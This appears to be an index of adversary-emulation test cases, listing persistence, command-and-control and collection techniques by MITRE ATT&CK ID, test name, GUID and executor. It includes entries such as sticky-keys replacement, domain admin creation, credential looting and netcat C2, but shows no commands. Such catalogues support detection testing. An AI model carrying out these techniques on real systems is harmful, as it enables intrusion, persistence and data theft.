899 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
900 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
901 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
902 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
903 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
904 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
905 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
906 persistence T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
907 persistence T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
908 persistence T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
909 persistence T1136.002 Create Account: Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
910 persistence T1136.002 Create Account: Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
911 persistence T1136.002 Create Account: Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
912 persistence T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
913 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 1 Persistence by modifying Windows Terminal profile ec5d76ef-82fe-48da-b931-bdb25a62bc65 powershell
914 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
915 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
916 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
917 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
918 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
919 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
920 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
921 persistence T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
922 persistence T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
923 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
924 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
925 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
926 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
927 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
928 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
929 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
930 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
931 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
932 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
933 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
934 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
935 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
936 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
937 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
938 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
939 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
940 persistence T1136.003 Create Account: Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
941 persistence T1136.003 Create Account: Cloud Account 2 Azure AD - Create a new user e62d23ef-3153-4837-8625-fa4a3829134d powershell
942 persistence T1136.003 Create Account: Cloud Account 3 Azure AD - Create a new user via Azure CLI 228c7498-be31-48e9-83b7-9cb906504ec8 powershell
943 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
944 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
945 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
946 persistence T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
947 persistence T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
948 persistence T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
949 persistence T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
950 persistence T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
951 persistence T1098 Account Manipulation 9 Password Change on Directory Service Restore Mode (DSRM) Account d5b886d9-d1c7-4b6e-a7b0-460041bf2823 command_prompt
952 persistence T1098 Account Manipulation 10 Domain Password Policy Check: Short Password fc5f9414-bd67-4f5f-a08e-e5381e29cbd1 powershell
953 persistence T1098 Account Manipulation 11 Domain Password Policy Check: No Number in Password 68190529-069b-4ffc-a942-919704158065 powershell
954 persistence T1098 Account Manipulation 12 Domain Password Policy Check: No Special Character in Password 7d984ef2-2db2-4cec-b090-e637e1698f61 powershell
955 persistence T1098 Account Manipulation 13 Domain Password Policy Check: No Uppercase Character in Password b299c120-44a7-4d68-b8e2-8ba5a28511ec powershell
956 persistence T1098 Account Manipulation 14 Domain Password Policy Check: No Lowercase Character in Password 945da11e-977e-4dab-85d2-f394d03c5887 powershell
957 persistence T1098 Account Manipulation 15 Domain Password Policy Check: Only Two Character Classes 784d1349-5a26-4d20-af5e-d6af53bae460 powershell
958 persistence T1098 Account Manipulation 16 Domain Password Policy Check: Common Password Use 81959d03-c51f-49a1-bb24-23f1ec885578 powershell
959 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
960 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
961 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
962 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 4 Snake Malware Kernel Driver Comadmin e5cb5564-cc7b-4050-86e8-f2d9eec1941f powershell
963 persistence T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
964 persistence T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
965 persistence T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
966 persistence T1505.004 IIS Components 1 Install IIS Module using AppCmd.exe 53adbdfa-8200-490c-871c-d3b1ab3324b2 command_prompt
967 persistence T1505.004 IIS Components 2 Install IIS Module using PowerShell Cmdlet New-WebGlobalModule cc3381fb-4bd0-405c-a8e4-6cacfac3b06c powershell
968 persistence T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
969 persistence T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
970 persistence T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
971 persistence T1546 Event Triggered Execution 4 WMI Invoke-CimMethod Start Process adae83d3-0df6-45e7-b2c3-575f91584577 powershell
972 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
973 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
974 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 3 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
975 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 4 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
976 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 5 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
977 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 6 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
978 persistence T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
979 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
980 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
981 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
982 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
983 persistence T1137.004 Office Application Startup: Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
984 persistence T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
985 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
986 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
987 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
988 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
989 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
990 persistence T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
991 persistence T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
992 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
993 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
994 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
995 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
996 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
997 persistence T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
998 persistence T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
999 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
1000 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
1001 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
1002 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
1003 persistence T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
1004 persistence T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
1005 persistence T1137.002 Office Application Startup: Office Test 1 Office Application Startup Test Persistence (HKCU) c3e35b58-fe1c-480b-b540-7600fb612563 powershell
1006 persistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
1007 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
1008 persistence T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
1009 persistence T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
1010 persistence T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
1011 persistence T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
1012 persistence T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
1013 persistence T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
1014 persistence T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
1015 persistence T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
1016 persistence T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
1017 persistence T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
1018 persistence T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
1019 persistence T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
1020 persistence T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
1021 persistence T1078.003 Valid Accounts: Local Accounts 10 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
1022 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
1023 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
1024 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
1025 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
1026 command-and-control T1132.001 Data Encoding: Standard Encoding 2 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
1027 command-and-control T1071.004 Application Layer Protocol: DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
1028 command-and-control T1071.004 Application Layer Protocol: DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
1029 command-and-control T1071.004 Application Layer Protocol: DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
1030 command-and-control T1071.004 Application Layer Protocol: DNS 4 DNS C2 e7bf9802-2e78-4db9-93b5-181b7bcd37d7 powershell
1031 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
1032 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
1033 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
1034 command-and-control T1219 Remote Access Software 4 GoToAssist Files Detected Test on Windows 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 powershell
1035 command-and-control T1219 Remote Access Software 5 ScreenConnect Application Download and Install on Windows 4a18cc4e-416f-4966-9a9d-75731c4684c0 powershell
1036 command-and-control T1219 Remote Access Software 6 Ammyy Admin Software Execution 0ae9e327-3251-465a-a53b-485d4e3f58fa powershell
1037 command-and-control T1219 Remote Access Software 7 RemotePC Software Execution fbff3f1f-b0bf-448e-840f-7e1687affdce powershell
1038 command-and-control T1219 Remote Access Software 8 NetSupport - RAT Execution ecca999b-e0c8-40e8-8416-ad320b146a75 powershell
1039 command-and-control T1219 Remote Access Software 9 UltraViewer - RAT Execution 19acf63b-55c4-4b6a-8552-00a8865105c8 powershell
1040 command-and-control T1219 Remote Access Software 10 UltraVNC Execution 42e51815-a6cc-4c75-b970-3f0ff54b610e powershell
1041 command-and-control T1219 Remote Access Software 11 MSP360 Connect Execution b1b8128b-c5d4-4de9-bf70-e60419274562 powershell
1042 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
1043 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
1044 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
1045 command-and-control T1090.003 Proxy: Multi-hop Proxy 1 Psiphon 14d55ca0-920e-4b44-8425-37eedd72b173 powershell
1046 command-and-control T1090.003 Proxy: Multi-hop Proxy 2 Tor Proxy Usage - Windows 7b9d85e5-c4ce-4434-8060-d3de83595e69 powershell
1047 command-and-control T1090.003 Proxy: Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
1048 command-and-control T1090.003 Proxy: Multi-hop Proxy 4 Tor Proxy Usage - MacOS 12631354-fdbc-4164-92be-402527e748da sh
1049 command-and-control T1571 Non-Standard Port 1 Testing usage of uncommonly used port with PowerShell 21fe622f-8e53-4b31-ba83-6d333c2583f4 powershell
1050 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
1051 command-and-control T1573 Encrypted Channel 1 OpenSSL C2 21caf58e-87ad-440c-a6b8-3ac259964003 powershell
1052 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
1053 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
1054 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
1055 command-and-control T1071.001 Application Layer Protocol: Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
1056 command-and-control T1071.001 Application Layer Protocol: Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
1057 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
1058 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
1059 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
1060 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
1061 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
1062 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
1063 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
1064 command-and-control T1105 Ingress Tool Transfer 7 certutil download (urlcache) dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 command_prompt
1065 command-and-control T1105 Ingress Tool Transfer 8 certutil download (verifyctl) ffd492e3-0455-4518-9fb1-46527c9f241b powershell
1066 command-and-control T1105 Ingress Tool Transfer 9 Windows - BITSAdmin BITS Download a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b command_prompt
1067 command-and-control T1105 Ingress Tool Transfer 10 Windows - PowerShell Download 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 powershell
1068 command-and-control T1105 Ingress Tool Transfer 11 OSTAP Worming Activity 2ca61766-b456-4fcf-a35a-1233685e1cad command_prompt
1069 command-and-control T1105 Ingress Tool Transfer 12 svchost writing a file to a UNC path fa5a2759-41d7-4e13-a19c-e8f28a53566f command_prompt
1070 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
1071 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
1072 command-and-control T1105 Ingress Tool Transfer 15 File Download via PowerShell 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 powershell
1073 command-and-control T1105 Ingress Tool Transfer 16 File download with finger.exe on Windows 5f507e45-8411-4f99-84e7-e38530c45d01 command_prompt
1074 command-and-control T1105 Ingress Tool Transfer 17 Download a file with IMEWDBLD.exe 1a02df58-09af-4064-a765-0babe1a0d1e2 powershell
1075 command-and-control T1105 Ingress Tool Transfer 18 Curl Download File 2b080b99-0deb-4d51-af0f-833d37c4ca6a command_prompt
1076 command-and-control T1105 Ingress Tool Transfer 19 Curl Upload File 635c9a38-6cbf-47dc-8615-3810bc1167cf command_prompt
1077 command-and-control T1105 Ingress Tool Transfer 20 Download a file with Microsoft Connection Manager Auto-Download d239772b-88e2-4a2e-8473-897503401bcc command_prompt
1078 command-and-control T1105 Ingress Tool Transfer 21 MAZE Propagation Script 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf powershell
1079 command-and-control T1105 Ingress Tool Transfer 22 Printer Migration Command-Line Tool UNC share folder into a zip file 49845fc1-7961-4590-a0f0-3dbcf065ae7e command_prompt
1080 command-and-control T1105 Ingress Tool Transfer 23 Lolbas replace.exe use to copy file 54782d65-12f0-47a5-b4c1-b70ee23de6df command_prompt
1081 command-and-control T1105 Ingress Tool Transfer 24 Lolbas replace.exe use to copy UNC file ed0335ac-0354-400c-8148-f6151d20035a command_prompt
1082 command-and-control T1105 Ingress Tool Transfer 25 certreq download 6fdaae87-c05b-42f8-842e-991a74e8376b command_prompt
1083 command-and-control T1105 Ingress Tool Transfer 26 Download a file using wscript 97116a3f-efac-4b26-8336-b9cb18c45188 command_prompt
1084 command-and-control T1105 Ingress Tool Transfer 27 Linux Download File and Run bdc373c5-e9cf-4563-8a7b-a9ba720a90f3 sh
1085 command-and-control T1105 Ingress Tool Transfer 28 Nimgrab - Transfer Files b1729c57-9384-4d1c-9b99-9b220afb384e command_prompt
1086 command-and-control T1105 Ingress Tool Transfer 29 iwr or Invoke Web-Request download c01cad7f-7a4c-49df-985e-b190dcf6a279 command_prompt
1087 command-and-control T1090.001 Proxy: Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
1088 command-and-control T1090.001 Proxy: Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
1089 command-and-control T1090.001 Proxy: Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
1090 collection T1560.001 Archive Collected Data: Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
1091 collection T1560.001 Archive Collected Data: Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
1092 collection T1560.001 Archive Collected Data: Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
1093 collection T1560.001 Archive Collected Data: Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
1094 collection T1560.001 Archive Collected Data: Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
